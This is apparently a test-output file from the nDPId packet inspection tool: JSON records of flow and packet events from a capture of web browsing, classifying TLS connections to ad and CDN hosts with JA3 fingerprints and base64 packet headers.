+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1605291690449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690449,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYT7zrVEgBAB++0WAAABAQgKXwTqpcLXSbc="} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dQAAAAAoAL9IKwyAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReQAAAAAoAL9IG1mAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s24AAAAAoAL9IHV1AAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOkAAAAAoAL9INfoAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFQAAAAAoAL9IB2IAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygYAAAAAoAL9IOOcAAACBAWgBAIICqpUDK0AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9285,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9285,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtsAAAAAoAL9IO7kAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9286,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9286,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns154AAAAAoAL9IJ6VAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9287,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9287,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUEAAAAAoAL9IA5NAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9288,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyUAAAAAoAL9ILYPAAACBAWgBAIICriVOzQAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9293,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1605291690952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690952,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu21pGefV\/3l9HVoBJXgDRiAAACBAV4AQMDAwQCCArC10u2GsMWnw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9294,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1605291690952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690952,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dWRnn1ggBAB+7hZAAABAQgKGsMWucLXS7Y="} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9300,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22KVwltPCUkXloBJXgMhIAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9301,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReWlcJbUgBAB+0w+AAABAQgKGsMWu8LXS70="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9302,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22it1t9ZMt7NvoBJXgClQAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9303,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23LTmo6vQxszqoBJXgBZ9AAACBAV4AQMDAwQCCArC10u9GsMWnw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9304,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s28rdbfXgBAB+61FAAABAQgKGsMWu8LXS70="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9305,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOq05qOsgBAB+5pyAAABAQgKGsMWu8LXS70="} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9309,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23lfa6eczuyRVoBJXgHLsAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9310,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFVX2unogBAB+\/bgAAABAQgKGsMWvMLXS70="} 